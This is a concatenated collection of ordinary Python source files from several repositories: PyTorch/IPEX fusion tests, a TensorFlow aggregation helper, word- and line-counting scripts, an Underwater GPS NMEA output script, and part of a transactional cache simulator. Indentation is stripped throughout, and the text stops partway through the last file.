def test_output_conv_bn_3d(self):
self._test_output(
ConvBatchNorm_Fixed(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="aten::conv3d",
kind_not_in_graph="aten::batch_norm",)
self._test_output_bf16(
ConvBatchNorm_Fixed(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="aten::conv3d",
kind_not_in_graph="aten::batch_norm",
prec=0.02)
def test_output_conv_relu_2d(self):
self._test_output(
ConvRelu_Fixed(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_relu")
self._test_output_bf16(
ConvRelu_Fixed(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_relu")
def test_output_conv_relu_3d(self):
self._test_output(
ConvRelu_Fixed(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_relu")
self._test_output_bf16(
ConvRelu_Fixed(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_relu")
def test_output_conv_sum_2d(self):
self._test_output(
ConvSum(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_sum")
self._test_output_bf16(
ConvSum(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_sum",
prec=0.04)
def test_output_conv_sum_3d(self):
self._test_output(
ConvSum(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_sum")
self._test_output_bf16(
ConvSum(3, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_sum",
prec=0.04)
def test_output_cascaded_conv_bn_sum_relu_2d(self):
self._test_output(
CascadedConvBnSumRelu(2, 3, 64, 32, kernel_size=3, stride=1),
torch.rand(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_sum_relu",
kind_not_in_graph="aten::batch_norm")
self._test_output_bf16(
CascadedConvBnSumRelu(2, 3, 64, 32, kernel_size=3, stride=1),
torch.rand(32, 3, 64, 64),
kind_in_graph="ipex::conv2d_sum_relu",
kind_not_in_graph="aten::batch_norm",
prec=0.02)
def test_output_cascaded_conv_bn_sum_relu_3d(self):
self._test_output(
CascadedConvBnSumRelu(3, 3, 64, 32, kernel_size=3, stride=1),
torch.rand(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_sum_relu",
kind_not_in_graph="aten::batch_norm",)
self._test_output_bf16(
CascadedConvBnSumRelu(3, 3, 64, 32, kernel_size=3, stride=1),
torch.rand(32, 3, 32, 32, 32),
kind_in_graph="ipex::conv3d_sum_relu",
kind_not_in_graph="aten::batch_norm",
prec=0.02)
def test_output_linear_relu(self):
self._test_output(
LinearRelu(3, 32, bias=True),
torch.rand(32, 3),
kind_in_graph="ipex::linear_relu")
self._test_output_bf16(
LinearRelu(3, 32, bias=True),
torch.rand(32, 3),
kind_in_graph="ipex::linear_relu")
self._test_output(
LinearRelu(3, 32, bias=False),
torch.rand(32, 3),
kind_in_graph="ipex::linear_relu")
self._test_output_bf16(
LinearRelu(3, 32, bias=False),
torch.rand(32, 3),
kind_in_graph="ipex::linear_relu")
def test_jit_function(self):
        # test that both trace and script work for a plain function
def fn(input, weight, bias):
return F.linear(input, weight, bias)
input = torch.randn(2, 4)
weight = torch.randn(5, 4)
bias = torch.randn(5)
result = fn(input, weight, bias)
scripted_fn = torch.jit.script(fn)
traced_fn = torch.jit.trace(fn, (input, weight, bias))
self.assertEqual(scripted_fn(input, weight, bias), result)
self.assertEqual(traced_fn(input, weight, bias), result)
def test_jit_conv_sum_in_diff_block(self):
self._test_output(
ConvSumInDiffBlock(2, 3, 32, kernel_size=1, stride=1, padding=0),
torch.rand(32, 3, 64, 64),
kind_not_in_graph="ipex::conv2d_sum")
self._test_output_bf16(
ConvSumInDiffBlock(2, 3, 32, kernel_size=1, stride=1, padding=0),
torch.rand(32, 3, 64, 64),
kind_not_in_graph="ipex::conv2d_sum")
if __name__ == '__main__':
torch.manual_seed(2020)
core.enable_auto_dnnl()
test = unittest.main()
``` |
{
"source": "jiayixu64/graph-partition-neural-network-samples",
"score": 3
} |
#### File: gpnn/model/model_helper.py
```python
import tensorflow as tf
def aggregate(data, agg_idx, new_size, method="sum"):
""" Aggregate data
Args:
data: tf tensor, see "unsorted_segment_x" in tf documents for more detail
agg_idx: tf tensor of int, index for aggregation
new_size: tf tensor of int, size of the data after aggregation
method: aggregation method
Returns:
agg_data: tf tensor, aggregated data
"""
if method == "sum":
agg_data = tf.unsorted_segment_sum(data, agg_idx, new_size)
elif method == "avg":
agg_data = tf.unsorted_segment_sum(data, agg_idx, new_size)
denom_const = tf.unsorted_segment_sum(tf.ones_like(data), agg_idx, new_size)
agg_data = tf.div(agg_data, (denom_const + tf.constant(1.0e-10)))
elif method == "max":
agg_data = tf.unsorted_segment_max(data, agg_idx, new_size)
elif method == "min":
    agg_data = -tf.unsorted_segment_max(-data, agg_idx, new_size)  # min(x) = -max(-x)
else:
raise ValueError("Unsupported aggregation method!")
return agg_data
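# --- Illustrative usage sketch (not from the original repository) ---
# Shows how aggregate() pools per-node features into per-segment features;
# assumes a TensorFlow 1.x session environment, matching the API used above.
if __name__ == "__main__":
  data = tf.constant([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])
  agg_idx = tf.constant([0, 0, 1])  # rows 0 and 1 go to segment 0, row 2 to segment 1
  summed = aggregate(data, agg_idx, new_size=2, method="sum")    # [[4, 6], [5, 6]]
  averaged = aggregate(data, agg_idx, new_size=2, method="avg")  # [[2, 3], [5, 6]]
  with tf.Session() as sess:
    print(sess.run([summed, averaged]))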
``` |
{
"source": "JiayiXu/PythonLearning",
"score": 4
} |
#### File: PythonLearning/004_count_words/count.py
```python
import operator
import sys
def main(argv):
if len(argv) < 1:
print("Usage:get_count.py <file> <top count=10>")
sys.exit(2)
file_name = argv[0]
top_count = 10
if len(argv) > 1:
top_count = int(argv[1])
word_count = {}
with open(file_name, 'r') as file:
for line in file:
splits = line.split(' ')
for word in splits:
if word not in word_count:
word_count[word] = 0
word_count[word] = word_count[word] + 1
sorted_x = sorted(word_count.items(), key=operator.itemgetter(1))
sorted_x.reverse()
top_k = sorted_x[:top_count]
print("top k is {}".format(top_k))
if __name__ == '__main__':
main(sys.argv[1:])
```
#### File: PythonLearning/007_count_code_info/count_code_info.py
```python
import uuid
import sys
import os
def main(argv):
if len(argv) != 1:
print("Usage:count_count_info.py <path>")
sys.exit(2)
count_code = 0
count_comments = 0
count_spaces = 0
for dirpath, _, filenames in os.walk(argv[0]):
for file_name in filenames:
if os.path.splitext(file_name)[1] == '.py':
full_path = os.path.join(dirpath, file_name)
code, comments, spaces = get_statistics(full_path)
count_code += code
count_comments += comments
count_spaces += spaces
print("Count_code:%s, count_comments:%s, count_spaces:%s" % (count_code, count_comments, count_spaces))
def get_statistics(full_path):
count_code = 0
count_comments = 0
count_spaces = 0
with open(full_path, "r") as ins:
is_start_of_comments = False
for line in ins:
context = line.strip()
if context.startswith('#') or context.startswith('"""') or is_start_of_comments is True:
count_comments += 1
elif context == '':
count_spaces += 1
else:
count_code += 1
if context.startswith('"""'):
is_start_of_comments = True
if context[::-1].startswith('"""'):
is_start_of_comments = False
return count_code, count_comments, count_spaces
if __name__ == '__main__':
main(sys.argv[1:])
```
#### File: 007_count_code_info/test/test.py
```python
import abc
import sys
def a():
# type something
"""this is a test progmra"""
return c
``` |
{
"source": "JiaYong-Chen/Underwater-GPS-API",
"score": 3
} |
#### File: JiaYong-Chen/Underwater-GPS-API/olexoutput.py
```python
from __future__ import print_function
from nmeaoutput import get_data, checksum, send_udp, get_master_position
import requests
import argparse
import json
import time
from math import floor
import socket
import sys
def get_acoustic_position(base_url):
return get_data("{}/api/v1/position/acoustic/filtered".format(base_url))
def gen_ssb(time_t, x, y, z):
"""
    Generate PSIMSSB for Olex http://www.olex.no/olexiti.html
Valid sentence:
$PSIMSSB,180554.432,M44,A,,C,N,M,-61.300,39.017,34.026,0.072,T,0.050576,*47
1 ,2 ,3 ,5,6,7, 8 , 9 , 10 , 11 ,12,13, crc
1 = Time
2 = Name
3 = A
4 = Empty
5 = C - Cartesian
6 = N/E/H, N=North up, E=East up, H=vessel heading up
7 = any char, sw-filter: M Measured, F Filtered, P Predicted.
8 = distance in horizontal plane x (C+H => Starboard)
9 = distance in horizontal plane y (C+H => Forwards)
10 = distance in vertical plane depth
11 = ??
12 = T??
13 = ??
"""
    hhmmssss = '%02d%02d%02d' % (time_t.tm_hour, time_t.tm_min, time_t.tm_sec)  # struct_time carries no sub-second field
name = 'UGPS'
result = 'PSIMSSB,{0},{1},{2},{3},{4},{5},{6},{7:.2f},{8:.2f},{9:.2f},{10},{11},{12}'.format(
hhmmssss, name, 'A', '', 'C', 'H', 'M', x, y, z, 'T', '', '')
crc = checksum(result)
return '$%s*%0.2X' % (result, crc)
def gen_sns(time_t, heading):
"""
$PSIMSNS,180554.432,M44,1,2,0.0,1.0,2.0,42, , ,1.5, , ,*47
1 ,2 ,3,4,5 , 6 , 7 , 8,9,10, 11,12,13, crc
1 = Time
2 = Name
3 = Transceiver number
4 = Transducer number
5 = Roll
6 = Pitch
7 = Heave
8 = Heading
9 = Tag
10 = Parameters
11 = Time age
12 = Spare1
13 = Master/Slave
"""
    hhmmssss = '%02d%02d%02d' % (time_t.tm_hour, time_t.tm_min, time_t.tm_sec)  # struct_time carries no sub-second field
name = 'UGPS'
result = 'PSIMSNS,{0},{1},{2},{3},{4},{5},{6},{7:.1f},{8},{9},{10},{11},{12}'.format(
hhmmssss, name, '1', '1', '', '', '', heading, '', '', '1.0', '', '')
crc = checksum(result)
return '$%s*%0.2X' % (result, crc)
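# --- Illustrative usage sketch (not from the original script) ---
# How the two generators above are typically called; the x/y/z offsets and the
# heading are made-up values, and the trailing checksum depends on the payload.
#
#   now = time.gmtime()
#   print(gen_ssb(now, 2.0, 5.0, 10.0))  # "$PSIMSSB,HHMMSS,UGPS,A,,C,H,M,2.00,5.00,10.00,T,,*XX"
#   print(gen_sns(now, 171.5))           # "$PSIMSNS,HHMMSS,UGPS,1,1,,,,171.5,,,1.0,,*XX"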
class Sender(object):
def __init__(self, ser, sock, ip, port, verbose):
self.ser = ser
self.sock = sock
self.ip = ip
self.port = port
self.verbose = verbose
def send(self, sentence):
if self.verbose:
print(sentence)
if self.sock:
send_udp(self.sock, self.ip, self.port, sentence)
if self.ser:
self.ser.write(sentence + "\n")
def main():
if sys.version_info >= (3, 0):
sys.stdout.write("This has only been tested with Python 2.x, not Python 3.x\n")
sys.exit(1)
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-u', '--url', help='IP/URL of Underwater GPS kit. Typically http://192.168.2.94', type=str, default='http://demo.waterlinked.com')
parser.add_argument("-v", "--verbose", help="Print NMEA sentences", action="store_true")
# UDP options
parser.add_argument('-i', '--ip', help="Enable UDP output by specifying IP address to send UDP packets. Default disabled", type=str, default='')
parser.add_argument('-p', '--port', help="Port to send UDP packet", type=int, default=5000)
# Serial port options
parser.add_argument('-s', '--serial', help="Enable serial port output by specifying port to use. Example: '/dev/ttyUSB0' or 'COM1' Default disabled", type=str, default='')
parser.add_argument('-b', '--baud', help="Serial port baud rate", type=int, default=9600)
args = parser.parse_args()
if not (args.ip or args.serial):
parser.print_help()
print("ERROR: Please specify either serial port to use, ip address to use")
sys.exit(1)
print("Using base_url: {}".format(args.url))
ser = None
if args.serial:
import serial
print("Serial port: {}".format(args.serial))
ser = serial.Serial(args.serial, args.baud)
sock = None
if args.ip:
print("UDP: {} {}".format(args.ip, args.port))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sender = Sender(ser, sock, args.ip, args.port, args.verbose)
while True:
pos = get_acoustic_position(args.url)
if pos:
sentence = gen_ssb(time.gmtime(), pos["x"], pos["y"], pos["z"])
sender.send(sentence)
master = get_master_position(args.url)
if master:
sentence = gen_sns(time.gmtime(), master["orientation"])
sender.send(sentence)
time.sleep(0.2)
if __name__ == "__main__":
main()
``` |
{
"source": "jiayouanan/cc_cache",
"score": 2
} |
#### File: jiayouanan/cc_cache/OFF_main.py
```python
import configparser
import yaml
from multiprocessing import Process, Queue
from TCache.sys_op import WorkloadTest, SystemOperator
import os
import time
def backend_config_parse(filename='config/backend.ini'):
"""Parse backend connection configurations."""
parser = configparser.ConfigParser()
parser.read(filename)
db_conn_param, cache_conn_param = {}, {}
if parser.has_section("system"):
params = parser.items(section="system")
for param in params:
if param[0] == "db":
db_conn_param[param[0]] = param[1]
if param[0] == "cache":
cache_conn_param[param[0]] = param[1]
else:
print('[system] section not found in {}, exiting.'.format(filename))
exit(1)
db_params = parser.items(section=db_conn_param["db"])
for param in db_params:
db_conn_param[param[0]] = param[1]
cache_params = parser.items(section=cache_conn_param["cache"])
for param in cache_params:
cache_conn_param[param[0]] = param[1]
return db_conn_param, cache_conn_param
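# --- Illustrative config sketch (not from the original repository) ---
# A minimal config/backend.ini accepted by backend_config_parse(): the [system]
# section names the db/cache backends, and a section with that name holds the
# connection parameters. The concrete keys shown (host, port, dbname, user,
# password) are assumptions based on how SystemOperator consumes them.
#
#   [system]
#   db = postgresql
#   cache = memcached
#
#   [postgresql]
#   host = 127.0.0.1
#   port = 5432
#   dbname = ycsb
#   user = postgres
#   password = secret
#
#   [memcached]
#   host = 127.0.0.1
#   port = 11211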
def alg_config_parse(filename='config/sysTest.yaml'):
with open(filename, 'r') as fp:
try:
alg_dict = yaml.safe_load(fp)
alg_dict['dataset_dir'] = alg_dict['dataset_root'] + "/" + alg_dict['dataset_name']
return alg_dict
except yaml.YAMLError as exc:
print(exc)
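# --- Illustrative config sketch (not from the original repository) ---
# Keys a config/sysTest.yaml needs, inferred from how alg_dict is consumed in
# alg_process() and WorkloadTest.batch_test(); all values below are placeholders.
#
#   dataset_root: data/PointWrt
#   dataset_name: <generated workload directory name>
#   sys_test: true
#   csize: 0.1             # cache size as a fraction of the total item size
#   cache_scheme: <scheme name>
#   alg_name: <algorithm name>
#   batch_size: 500
#   reorder_flag: false
#   reorder_name: Greedy   # Greedy / Random / Readfir / Wrtfir
#   liveness_bound: 0
#   opt_len: 500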
def system_process(config_file, queue, sys_test):
"""Process DB and Cache operations."""
# ---------- debug only ----------
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
# ---------- debug only ----------
db_conn_param, cache_conn_param = backend_config_parse(config_file)
if sys_test:
sys_op = SystemOperator(db_conn_param, cache_conn_param)
print('SYS Start Time: {}'.format(time.time()))
sys_op.operation_exe(op_queue=queue)
print('SYS End Time: {}'.format(time.time()))
sys_op.cleanup()
def alg_process(alg_dict, queue):
alg_test = WorkloadTest(dataset_dir=alg_dict['dataset_dir'], sys_test=alg_dict['sys_test'])
print('ALG Start time: {}'.format(time.time()))
alg_test.batch_test(queue, csize=alg_dict['csize'], cache_scheme=alg_dict['cache_scheme'], alg_name=alg_dict['alg_name'], batch_size=alg_dict['batch_size'],
reorder_flag=alg_dict['reorder_flag'], liveness_bound=alg_dict['liveness_bound'], reorder_name=alg_dict['reorder_name'], opt_len=alg_dict['opt_len'])
print('ALG End Time: {}'.format(time.time()))
if __name__ == '__main__':
alg_dict = alg_config_parse('config/sysTest.yaml')
op_queue = Queue() # system operation queue
sys_test = alg_dict['sys_test']
p = Process(target=system_process, args=('config/backend.ini', op_queue, sys_test)) # child process
p.start()
alg_process(alg_dict, op_queue) # parent process
p.join()
```
#### File: cc_cache/TCache/sys_op.py
```python
from multiprocessing import Queue
import time
from utils.load_dataset import load_item_univ, load_txn_univ, load_txn_seq, load_ycsb_seq
from TCache.cache_alg import SingleAlg
from TCache.reorder_alg import ReorderAlg
import numpy as np
import json
import pdb
import os
import psycopg2
import happybase
from pymemcache.client import base
from pymemcache.client.base import PooledClient
import csv
class WorkloadManager(object):
"""Manage workload for TCache
"""
def __init__(self, dataset_dir: str, sys_test=True) -> None:
super().__init__()
# load entire workload data from dataset_dir
item_size_path = dataset_dir + '/item_size.pkl'
cls_item_path = dataset_dir + '/cls_item.pkl'
txn_item_path = dataset_dir + '/txn_item.pkl'
id_seq_path = dataset_dir + '/id_seq.npy'
flag_seq_path = dataset_dir + '/flag_seq.npy'
self.item_size_dict, self.cls_item_dict = load_item_univ(item_size_path, cls_item_path)
self.txn_item_dict = load_txn_univ(txn_item_path)
self.txn_id_seq, self.write_flag_seq = load_txn_seq(id_seq_path, flag_seq_path)
if sys_test:
ycsb_seq_path = dataset_dir + '/transactions.dat'
self.ycsb_id_2_key, self.ycsb_id_2_read, self.ycsb_id_2_write = load_ycsb_seq(ycsb_seq_path)
self.get_workload_stats(print_stats=True)
def get_workload_stats(self, print_stats=True) -> None:
""" Get statistics for workload data. """
query_num = len(self.item_size_dict)
cls_num = len(self.cls_item_dict)
seq_len = len(self.txn_id_seq)
read_qry_cnt, wrt_qry_cnt = 0, 0
wrt_txn_cnt = self.write_flag_seq.sum()
read_txn_cnt = len(self.write_flag_seq) - wrt_txn_cnt
# item_read_time_dict & item_write_time_dict just for workload statistics
item_read_time_dict, item_write_time_dict = {i:[] for i in range(query_num)}, {i:[] for i in range(query_num)}
for time_step in range(len(self.txn_id_seq)):
txn_vec = self.txn_item_dict[self.txn_id_seq[time_step]]
if self.write_flag_seq[time_step]:
wrt_qry_cnt += np.sum(txn_vec)
for item_id in np.where(txn_vec == 1)[0]:
item_write_time_dict[item_id].append(time_step)
else:
read_qry_cnt += np.sum(txn_vec)
for item_id in np.where(txn_vec == 1)[0]:
item_read_time_dict[item_id].append(time_step)
dist_read_qry_cnt, dist_wrt_qry_cnt = 0, 0
for i in range(query_num):
if len(item_read_time_dict[i]) > 0:
dist_read_qry_cnt += 1
if len(item_write_time_dict[i]) > 0:
dist_wrt_qry_cnt += 1
total_item_size = sum(self.item_size_dict.values())
self.workload_stats = {'query_num': query_num, 'cls_num': cls_num,
'total_size': total_item_size, 'seq_len': seq_len,
'read_txn_cnt': read_txn_cnt, 'write_txn_cnt': wrt_txn_cnt,
'read_qry_cnt': read_qry_cnt, 'write_qry_cnt': wrt_qry_cnt,
'unique_read_qry_cnt': dist_read_qry_cnt, 'unique_write_qry_cnt': dist_wrt_qry_cnt}
workload_stats_columns = ['query_num', 'cls_num', 'total_size', 'seq_len',
'read_txn_cnt', 'write_txn_cnt', 'read_qry_cnt', 'write_qry_cnt', 'unique_read_qry_cnt', 'unique_write_qry_cnt']
dict_data = [
{'query_num': query_num, 'cls_num': cls_num,
'total_size': total_item_size, 'seq_len': seq_len,
'read_txn_cnt': read_txn_cnt, 'write_txn_cnt': wrt_txn_cnt,
'read_qry_cnt': read_qry_cnt, 'write_qry_cnt': wrt_qry_cnt,
'unique_read_qry_cnt': dist_read_qry_cnt, 'unique_write_qry_cnt': dist_wrt_qry_cnt}]
csv_file = "data/res/workload_stats.csv"
try:
with open(csv_file, 'a', newline='') as p: # a means append
writer = csv.DictWriter(p, fieldnames=workload_stats_columns)
if os.stat(csv_file).st_size == 0: # if csv_file is empty, then add the header
writer.writeheader()
for data in dict_data:
writer.writerow(data)
except IOError:
print("I/O error")
if print_stats:
print(self.workload_stats)
# json.dumps(self.workload_stats, indent=4)
class WorkloadTest(WorkloadManager):
""" Create input for algorithm, operate Cache and DB accordingly. """
def __init__(self, dataset_dir: str, sys_test=True) -> None:
super().__init__(dataset_dir, sys_test)
self.sys_test = sys_test
        self.orireor_txn_id_seq = np.zeros(self.workload_stats['seq_len'], dtype=int) # reordered seq based on our strategy
self.ran_txn_id_seq = np.zeros(self.workload_stats['seq_len'], dtype=int)
self.readfir_txn_id_seq = np.zeros(self.workload_stats['seq_len'], dtype=int) #
self.wrtfir_txn_id_seq = np.zeros(self.workload_stats['seq_len'], dtype=int)
# generate reordered txn_id_seq, write_flag_seq and txn_item_dict
self.reor_txn_id_seq = np.zeros(self.workload_stats['seq_len'], dtype=int)
self.reor_write_flag_seq = np.zeros(self.workload_stats['seq_len'], dtype=int)
self.reor_txn_item_dict = {}
def generate_reor_res_seq(self, batch_start, batch_size, orireor_txn_id_seq, write_flag_seq, txn_item_dict):
""" generate reordered txn_id_seq, write_flag_seq and txn_item_dict based on orireor_txn_id_seq"""
for ordered_txn_num in range(batch_size):
self.reor_txn_id_seq[batch_start+ordered_txn_num] = batch_start+ordered_txn_num
self.reor_write_flag_seq[batch_start+ordered_txn_num] = write_flag_seq[orireor_txn_id_seq[batch_start+ordered_txn_num]]
self.reor_txn_item_dict[batch_start+ordered_txn_num] = txn_item_dict[orireor_txn_id_seq[batch_start+ordered_txn_num]]
def batch_test(self, queue: Queue, csize: float, cache_scheme: str, alg_name: str, batch_size: int, reorder_flag:bool, liveness_bound:int, reorder_name:str, opt_len=500) -> dict:
""" Test transaction sequence in batches. """
assert self.workload_stats['seq_len'] % batch_size == 0 # transaction sequence consists of full batches by default
cache_size = int(csize * self.workload_stats['total_size'])
assert 'Comb' not in alg_name # TODO: support combiner style caching algorithm
alg_obj = SingleAlg(alg_name)
# using opt_len as findOB truncate length for optimization
alg_obj.workload_init(cache_size, cache_scheme, item_num=self.workload_stats['query_num'], findOB_trunc=opt_len)
batch_num = int(self.workload_stats['seq_len'] / batch_size)
item_num = self.workload_stats['query_num']
seq_start_time = time.time()
off_liveness, ran_liveness, readfir_liveness, wrtfir_liveness = 0, 0, 0, 0
off_max_liveness, ran_max_liveness, readfir_max_liveness, wrtfir_max_liveness = 0, 0, 0, 0
for i in range(batch_num):
batch_start, batch_end = i * batch_size, (i + 1) * batch_size
# TODO: define a new reorder object, generate the reordered txn_id_seq[batch_start:batch_end] & write_flag_seq[batch_start:batch_end]
if reorder_flag:
print("reordering start")
reorder_obj = ReorderAlg(cache_size)
reorder_obj.init_read_write_time(item_num, txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, batch_start=batch_start)
if reorder_name in ['Greedy']:
# print("Greedy reorder algorithm")
reorder_obj.get_writetxn_bond_readtxn(batch_start=batch_start, batch_end=batch_end,
txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, liveness_bound=liveness_bound)
reorder_obj.pick_readtxn2wrttxn(batch_start, batch_size)
self.orireor_txn_id_seq = reorder_obj.reorder_read_main(item_num, batch_start, batch_size, self.txn_id_seq[batch_start:batch_end],
self.write_flag_seq[batch_start:batch_end], self.item_size_dict, self.txn_item_dict, self.orireor_txn_id_seq)
self.generate_reor_res_seq(batch_start, batch_size, self.orireor_txn_id_seq, self.write_flag_seq, self.txn_item_dict)
# compute the liveness based on the reordered seq
off_liveness_res = reorder_obj.get_livenessbound(item_num, batch_start=batch_start,
txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, reor_txn_id_seq=self.orireor_txn_id_seq[batch_start:batch_end],
liveness_bound=liveness_bound)
off_liveness += off_liveness_res[0]
off_max_liveness += off_liveness_res[1]
if reorder_name in ['Random']:
self.ran_txn_id_seq = reorder_obj.get_random_seq(batch_start, batch_end, self.ran_txn_id_seq)
ran_liveness_res = reorder_obj.get_livenessbound(item_num, batch_start=batch_start,
txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, reor_txn_id_seq=self.ran_txn_id_seq[batch_start:batch_end],
liveness_bound=liveness_bound)
ran_liveness += ran_liveness_res[0]
ran_max_liveness += ran_liveness_res[1]
self.generate_reor_res_seq(batch_start, batch_size, self.ran_txn_id_seq, self.write_flag_seq, self.txn_item_dict)
if reorder_name in ['Readfir']:
self.readfir_txn_id_seq = reorder_obj.get_allreadfirst_seq(batch_start, batch_size, self.readfir_txn_id_seq)
readfir_liveness_res = reorder_obj.get_livenessbound(item_num, batch_start=batch_start,
txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, reor_txn_id_seq=self.readfir_txn_id_seq[batch_start:batch_end],
liveness_bound=liveness_bound)
readfir_liveness += readfir_liveness_res[0]
readfir_max_liveness += readfir_liveness_res[1]
self.generate_reor_res_seq(batch_start, batch_size, self.readfir_txn_id_seq, self.write_flag_seq, self.txn_item_dict)
if reorder_name in ['Wrtfir']:
self.wrtfir_txn_id_seq = reorder_obj.get_allwrtfirst_seq(batch_start, batch_size, self.wrtfir_txn_id_seq)
wrtfir_liveness_res = reorder_obj.get_livenessbound(item_num, batch_start=batch_start,
txn_id_seq=self.txn_id_seq[batch_start:batch_end],
write_flag_seq=self.write_flag_seq[batch_start:batch_end],
txn_item_dict=self.txn_item_dict, reor_txn_id_seq=self.wrtfir_txn_id_seq[batch_start:batch_end],
liveness_bound=liveness_bound)
wrtfir_liveness += wrtfir_liveness_res[0]
wrtfir_max_liveness += wrtfir_liveness_res[1]
self.generate_reor_res_seq(batch_start, batch_size, self.wrtfir_txn_id_seq, self.write_flag_seq, self.txn_item_dict)
else:
self.reor_txn_id_seq = self.txn_id_seq
self.reor_write_flag_seq = self.write_flag_seq
self.reor_txn_item_dict = self.txn_item_dict
# get item read and write time for current batch
alg_obj.init_read_write_time(txn_id_seq=self.reor_txn_id_seq[batch_start:batch_end],
write_flag_seq=self.reor_write_flag_seq[batch_start:batch_end],
txn_item_dict=self.reor_txn_item_dict, batch_start=batch_start)
for time_step in range(batch_start, batch_end):
op_ret_dict = alg_obj.batch_step_process(time_step, batch_start, batch_end, self.reor_txn_id_seq[batch_start:batch_end],
self.reor_write_flag_seq[batch_start:batch_end], self.item_size_dict, self.reor_txn_item_dict, self.cls_item_dict)
if self.sys_test:
# TODO: carry out cache and DB operation here
tmp_op_dict = {}
if 'write_items' in op_ret_dict:
query_list = [self.ycsb_id_2_write[item_id] for item_id in np.where(op_ret_dict['write_items'] == 1)[0]]
tmp_op_dict['db_write'] = query_list
tmp_op_dict['db_write_key'] = [self.ycsb_id_2_key[item_id] for item_id in np.where(op_ret_dict['write_items'] == 1)[0]]
# self.db_write_txn(query_list)
if 'acc_update' in op_ret_dict:
item_to_load = [item_id for item_id in np.where(op_ret_dict['acc_update'] == 1)[0]]
query_list = [self.ycsb_id_2_read[item_id] for item_id in item_to_load]
tmp_op_dict['acc_update'] = query_list
tmp_op_dict['acc_update_key'] = [self.ycsb_id_2_key[item_id] for item_id in item_to_load]
if 'evict_from_cache' in op_ret_dict:
tmp_op_dict['cache_evict'] = [self.ycsb_id_2_key[item_id] for item_id in np.where(op_ret_dict['evict_from_cache'] == 1)[0]]
if 'read_on_miss' in op_ret_dict:
item_to_load = [item_id for item_id in np.where(op_ret_dict['read_on_miss'] == 1)[0]]
query_list = [self.ycsb_id_2_read[item_id] for item_id in item_to_load]
tmp_op_dict['read_on_miss'] = query_list
tmp_op_dict['read_on_miss_key'] = [self.ycsb_id_2_key[item_id] for item_id in item_to_load]
# self.load_to_cache(op_ret_dict['read_on_miss'])
if 'read_on_abort' in op_ret_dict:
item_to_load = [item_id for item_id in np.where(op_ret_dict['read_on_abort'] == 1)[0]]
query_list = [self.ycsb_id_2_read[item_id] for item_id in item_to_load]
tmp_op_dict['read_on_abort'] = query_list
tmp_op_dict['read_on_abort_key'] = [self.ycsb_id_2_key[item_id] for item_id in item_to_load]
# self.load_to_cache(op_ret_dict['read_on_abort'])
if 'read_from_cache' in op_ret_dict:
tmp_op_dict['cache_read'] = [self.ycsb_id_2_key[item_id] for item_id in np.where(op_ret_dict['read_from_cache'] == 1)[0]]
# txn_answ = self.cache_client.get_many([self.ycsb_id_2_key[item_id] for item_id in np.where(op_ret_dict['read_from_cache'] == 1)[0]])
queue.put(tmp_op_dict)
queue.put(None)
seq_end_time = time.time()
alg_obj.print_stats()
# print('off_liveness: {}, ran_liveness: {}, readfir_liveness: {}, wrtfir_liveness: {}'.format(
# off_liveness/batch_num, ran_liveness/batch_num, readfir_liveness/batch_num, wrtfir_liveness/batch_num))
        # this csv file is only useful when comparing the performance of the reorder strategies.
res_columns = ['off_avg_liveness', 'ran_avg_liveness', 'readfir_avg_liveness', 'wrtfir_avg_liveness',
'off_max_liveness', 'ran_max_liveness', 'readfir_max_liveness', 'wrtfir_max_liveness']
dict_data = [
{'off_avg_liveness': off_liveness/batch_num, 'ran_avg_liveness': ran_liveness/batch_num, 'readfir_avg_liveness': readfir_liveness/batch_num, 'wrtfir_avg_liveness': wrtfir_liveness/batch_num,
'off_max_liveness': off_max_liveness/batch_num, 'ran_max_liveness': ran_max_liveness/batch_num, 'readfir_max_liveness': readfir_max_liveness/batch_num, 'wrtfir_max_liveness': wrtfir_max_liveness/batch_num}]
csv_file = "data/res/liveness.csv"
try:
with open(csv_file, 'a', newline='') as p: # a means append
writer = csv.DictWriter(p, fieldnames=res_columns)
if os.stat(csv_file).st_size == 0: # if csv_file is empty, then add the header
writer.writeheader()
for data in dict_data:
writer.writerow(data)
except IOError:
print("I/O error")
res_columns = ['alg_name', 'cache_scheme', 'cost', 'whole_cost',
'ob_cnt', 'evict_cnt','cch_cnt']
dict_data = [
{'alg_name': alg_obj.alg_name, 'cache_scheme': alg_obj.cache_scheme, 'cost': alg_obj.cost, 'whole_cost': alg_obj.whole_cost,
'ob_cnt': alg_obj.ob_cnt, 'evict_cnt': alg_obj.evict_cnt, 'cch_cnt': alg_obj.cch_cnt}]
